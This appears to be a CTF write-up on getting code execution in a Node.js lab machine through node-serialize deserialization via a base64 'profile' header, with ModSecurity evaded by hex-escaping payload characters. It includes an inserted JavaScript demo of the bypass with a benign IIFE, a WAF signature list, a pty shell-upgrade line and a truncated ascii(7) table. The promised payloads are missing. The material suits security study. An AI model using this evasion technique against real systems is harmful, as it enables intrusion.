The site redirects to windcorp.htb, so I had to add it to /etc/hosts.
From the source code we know that it's using MyBiz v4.7.0 from Bootstrap.
Nothing crazy here.
I tried admin'||'1'=='1 as this is running on Node.js, but it says wrong credentials.
But admin:admin works on this page.
In Burp, I looked at the login process. First it makes a POST request to submit the credentials, and then it sends another GET request with a new header, profile, which is basically the credentials in JSON format, base64-encoded.
This post explains how to abuse JS deserialization to get code execution.
TL;DR
Untrusted data passed into the unserialize() function of the node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript object containing an Immediately Invoked Function Expression (IIFE).
The post explains the attack, and also how to get a reverse shell from it.
First, let's create the payload:
This is what it'll look like
But we hit ModSecurity, which is a WAF. It says Action Blocked.
Turns out ModSecurity filters this part of the payload and does not allow it:
After modifying this we still get Action Blocked. Turns out other functions are also filtered, such as the ones found in the core rules.
So I modified some more. A useful reference for converting ASCII to hex was the man page for ascii.
I chose a few characters in the payload and replaced them with hex escapes, and the final reverse shell payload was:
And we get a shell on the listening port.
We get a shell on the Linux VM as the user webster.
# Some generic snippets used:
# - function() {
# - new Function(
# - eval(
# - String.fromCharCode(
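The following is an added example, not code from the write-up or from node-serialize, that puts the pieces above together end to end: a minimal reimplementation of node-serialize's unserialize() (assumption: it mirrors the library's behaviour of wrapping any string prefixed with `_$$ND_FUNC$$_` in parentheses and eval()ing it), the profile header as described (base64 of the JSON credentials), a toy substring filter standing in for ModSecurity (the four snippets listed above plus an assumed `/bin/sh` shell signature; the real CRS is far broader), and a hex-escaping helper driven by the ascii(7) values. The IIFE is deliberately benign: instead of `require('child_process').exec(...)` it returns the command it would have run, so you can see the function fire inside unserialize() without spawning anything. The command string and the exact spacing of the function expression are constructed for illustration.

```javascript
// Flag node-serialize puts in front of serialized functions.
const FUNCFLAG = '_$$ND_FUNC$$_';

// Vulnerable deserializer (assumption: reimplements the core of
// node-serialize's unserialize(); this is not the library's own code).
// Every string value starting with FUNCFLAG is wrapped in parentheses and
// eval()'d, so "function (){ ... }()" becomes an IIFE that runs right here,
// before the application ever looks at the decoded object.
function unserialize(serialized) {
  const obj = JSON.parse(serialized);
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (typeof v === 'string' && v.startsWith(FUNCFLAG)) {
      obj[key] = eval('(' + v.slice(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// Replace the listed characters of a string with \xNN escapes using the
// ascii(7) values (e.g. '/' -> \x2f, 's' -> \x73). The escapes are only
// decoded when the JS engine parses the string literal, i.e. after the WAF
// has already inspected the request body. Only characters inside a quoted
// string can be hidden this way; keywords and identifiers cannot.
function hexEscape(s, chars) {
  return [...s].map(ch => chars.includes(ch)
    ? '\\x' + ch.charCodeAt(0).toString(16).padStart(2, '0')
    : ch).join('');
}

// Toy WAF: substring signatures from the write-up's list plus a unix shell
// signature (assumption: CRS carries comparable RCE signatures; this is not
// ModSecurity). Returns true when the request would be let through.
const SIGNATURES = ['function() {', 'new Function(', 'eval(', 'String.fromCharCode(', '/bin/sh'];
function wafAllows(profileHeader) {
  const body = Buffer.from(profileHeader, 'base64').toString('utf8');
  return !SIGNATURES.some(sig => body.includes(sig));
}

// Build the "profile" header seen in Burp: base64 of the JSON credentials,
// with the username field carrying the flagged function string.
function buildProfile(fnSource) {
  const json = JSON.stringify({ username: FUNCFLAG + fnSource, password: 'x' });
  return Buffer.from(json, 'utf8').toString('base64');
}

// Benign stand-in for the reverse shell: the IIFE returns the command it
// would have passed to exec(), so the effect is observable without running
// it. "function (){" is spaced so it does not match the literal "function() {".
function iifeSource(cmd) {
  return "function (){ return 'ran: ' + '" + cmd + "' }()";
}

const CMD = '/bin/sh -c id'; // constructed sample command

// Plain payload: the toy WAF blocks it on "/bin/sh".
const plainProfile = buildProfile(iifeSource(CMD));
// Escaped payload: rewriting just '/' and 's' is enough to break the substring.
const escapedProfile = buildProfile(iifeSource(hexEscape(CMD, '/s')));

// What the vulnerable app does with the header: WAF check, base64-decode,
// then unserialize(), which is where the IIFE executes.
function serverHandle(profileHeader) {
  if (!wafAllows(profileHeader)) return 'Action Blocked';
  const json = Buffer.from(profileHeader, 'base64').toString('utf8');
  return unserialize(json).username;
}

console.log(serverHandle(plainProfile));   // Action Blocked
console.log(serverHandle(escapedProfile)); // ran: /bin/sh -c id
```

The fix on the application side is not a better signature list but never feeding untrusted input to node-serialize's unserialize(): a plain JSON.parse() of the decoded header cannot execute anything, and the credentials should not be round-tripped through a client-controlled header at all.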
ascii(7) Miscellaneous Information Manual ascii(7)
NAME
ascii - ASCII character set encoded in octal, decimal, and hexadecimal
DESCRIPTION
ASCII is the American Standard Code for Information Interchange. It is a 7-bit code. Many 8-bit codes (e.g., ISO/IEC 8859-1) contain ASCII as their lower half. The international counterpart of ASCII is known as ISO/IEC 646-IRV.
The following table contains the 128 ASCII characters.
C program '\X' escapes are noted.
Oct Dec Hex Char Oct Dec Hex Char
────────────────────────────────────────────────────────────────────────
000 0 00 NUL '\0' (null character) 100 64 40 @
001 1 01 SOH (start of heading) 101 65 41 A
002 2 02 STX (start of text) 102 66 42 B
003 3 03 ETX (end of text) 103 67 43 C
004 4 04 EOT (end of transmission) 104 68 44 D
005 5 05 ENQ (enquiry) 105 69 45 E
006 6 06 ACK (acknowledge) 106 70 46 F
007 7 07 BEL '\a' (bell) 107 71 47 G
010 8 08 BS '\b' (backspace) 110 72 48 H
011 9 09 HT '\t' (horizontal tab) 111 73 49 I
012 10 0A LF '\n' (new line) 112 74 4A J
013 11 0B VT '\v' (vertical tab) 113 75 4B K
014 12 0C FF '\f' (form feed) 114 76 4C L
015 13 0D CR '\r' (carriage ret) 115 77 4D M
016 14 0E SO (shift out) 116 78 4E N
017 15 0F SI (shift in) 117 79 4F O
020 16 10 DLE (data link escape) 120 80 50 P
021 17 11 DC1 (device control 1) 121 81 51 Q
022 18 12 DC2 (device control 2) 122 82 52 R
023 19 13 DC3 (device control 3) 123 83 53 S
024 20 14 DC4 (device control 4) 124 84 54 T
025 21 15 NAK (negative ack.) 125 85 55 U
026 22 16 SYN (synchronous idle) 126 86 56 V
027 23 17 ETB (end of trans. blk) 127 87 57 W
030 24 18 CAN (cancel) 130 88 58 X
031 25 19 EM (end of medium) 131 89 59 Y
032 26 1A SUB (substitute) 132 90 5A Z
033 27 1B ESC (escape) 133 91 5B [
python3 -c 'import pty; pty.spawn("/bin/bash")'
webster@webserver:/$ ls
ls
bin home lib32 media root sys vmlinuz
boot initrd.img lib64 mnt run tmp vmlinuz.old
dev initrd.img.old libx32 opt sbin usr
etc lib lost+found proc srv var